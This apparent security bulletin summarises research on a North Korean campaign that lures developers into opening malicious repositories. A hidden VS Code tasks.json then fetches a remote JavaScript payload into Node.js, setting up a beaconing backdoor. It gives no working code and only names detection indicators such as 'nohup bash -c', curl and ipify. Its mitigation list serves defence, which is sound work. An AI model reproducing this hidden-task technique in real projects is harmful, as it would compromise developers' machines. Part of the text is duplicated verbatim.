VS Code Exploited by DPRK Hackers: New Backdoor Attack Discovered
Summary:
The Contagious Interview campaign, attributed to a North Korean (DPRK) state-sponsored threat actor under the Lazarus APT umbrella, has evolved to employ a sophisticated infection chain targeting software developers. Jamf Threat Labs has been closely monitoring Contagious Interview since its last published research on the cluster and released another analysis that details December 2025 activity, which highlights a delivery technique used in addition to the previously-documented ClickFix tactics. This variation of the campaign abuses Microsoft Visual Studio Code task configuration files, allowing malicious payloads to be executed on the victim system.
The campaign utilizes social engineering tactics where victims are coerced into cloning and opening malicious Git repositories hosted on GitHub or GitLab, typically under the guise of a job recruitment process or technical assessment. Once the victim opens the repository in Visual Studio Code and accepts the prompt to "trust" the author, the attack creates a technical threat vector by automatically processing a malicious tasks.json configuration file. This execution chain launches a background shell command on macOS systems that retrieves a remote JavaScript payload and pipes it directly into the Node.js runtime, enabling the execution of arbitrary JavaScript (while the backdoor is active) and establishing a foothold for persistent C2 communication without writing the payload to disk.
Security Officer Comments:
The campaign demonstrates a shift of DPRK-sponsored APT tactics toward abusing trusted developer tools like VS Code and Node.js, with code analysis suggesting the use of AI-assisted code generation in their malware development. The malware's core functionality relies on a persistent execution loop that fingerprints the system (collecting hostnames, MAC addresses, and OS details) and beacons to a Command-and-Control (C2) server every five seconds. The implant utilizes a require function to enable Remote Code Execution (RCE), allowing the dynamic import of Node.js modules and the execution of arbitrary JavaScript supplied by the attacker. The attack specifically targets macOS environments.
The most recent evolution in the campaign, discovered in January 2026, involves the deployment of a fully functional backdoor implant. This threat poses a high risk to development environments, offering adversaries the opportunity to steal sensitive intellectual property and the potential to pivot further into corporate networks via compromised developer workstations.
Suggested Corrections:
IOCs are available in Jamf Threat Labs’ article.
The following mitigation strategies are derived from the guidance provided in the report, aligned with the NIST CSF 2.0:
https://www.jamf.com/blog/threat-actors-expand-abuse-of-visual-studio-code/
The Contagious Interview campaign, attributed to a North Korean (DPRK) state-sponsored threat actor under the Lazarus APT umbrella, has evolved to employ a sophisticated infection chain targeting software developers. Jamf Threat Labs has been closely monitoring Contagious Interview since its last published research on the cluster and released another analysis that details December 2025 activity, which highlights a delivery technique used in addition to the previously-documented ClickFix tactics. This variation of the campaign abuses Microsoft Visual Studio Code task configuration files, allowing malicious payloads to be executed on the victim system.
The campaign utilizes social engineering tactics where victims are coerced into cloning and opening malicious Git repositories hosted on GitHub or GitLab, typically under the guise of a job recruitment process or technical assessment. Once the victim opens the repository in Visual Studio Code and accepts the prompt to "trust" the author, the attack creates a technical threat vector by automatically processing a malicious tasks.json configuration file. This execution chain launches a background shell command on macOS systems that retrieves a remote JavaScript payload and pipes it directly into the Node.js runtime, enabling the execution of arbitrary JavaScript (while the backdoor is active) and establishing a foothold for persistent C2 communication without writing the payload to disk.
Security Officer Comments:
The campaign demonstrates a shift of DPRK-sponsored APT tactics toward abusing trusted developer tools like VS Code and Node.js, with code analysis suggesting the use of AI-assisted code generation in their malware development. The malware's core functionality relies on a persistent execution loop that fingerprints the system (collecting hostnames, MAC addresses, and OS details) and beacons to a Command-and-Control (C2) server every five seconds. The implant utilizes a require function to enable Remote Code Execution (RCE), allowing the dynamic import of Node.js modules and the execution of arbitrary JavaScript supplied by the attacker. The attack specifically targets macOS environments.
The most recent evolution in the campaign, discovered in January 2026, involves the deployment of a fully functional backdoor implant. This threat poses a high risk to development environments, offering adversaries the opportunity to steal sensitive intellectual property and the potential to pivot further into corporate networks via compromised developer workstations.
Suggested Corrections:
IOCs are available in Jamf Threat Labs’ article.
The following mitigation strategies are derived from the guidance provided in the report, aligned with the NIST CSF 2.0:
- Identify (ID):
- Maintain asset inventories of developer workstations and installed tools (e.g., VS Code, Node.js).
- Assess risks associated with third-party code repositories and recruitment processes involving technical take-home tasks.
- Protect (PR):
- Endpoint Defense: Ensure Threat Prevention and Advanced Threat Controls are enabled and set to block mode (specifically mentioned for Jamf for Mac).
- Workflow Verification: Developers must review repository contents, specifically tasks.json, package.json, and install scripts, before marking a repository as trusted in Visual Studio Code.
- Supply Chain Security: Only run npm install on projects that have been thoroughly vetted to avoid executing malicious code.
- Detect (DE):
- Monitor for unusual child processes spawned by Visual Studio Code, particularly those involving nohup bash -c or curl.
- Detect persistent network beaconing to known C2 identifiers or unusual requests to external IP resolution services like ipify[.]org.
- Respond (RS):
- Isolate hosts immediately upon detection of the backdoor implant or unauthorized C2 communication.
- Analyze the specific hard-coded identifiers in the malware to determine the scope of the infection session.
- Recover (RC):
- Reimage compromised workstations to ensure the removal of the persistent execution loop and any secondary payloads deployed via the RCE capability.
https://www.jamf.com/blog/threat-actors-expand-abuse-of-visual-studio-code/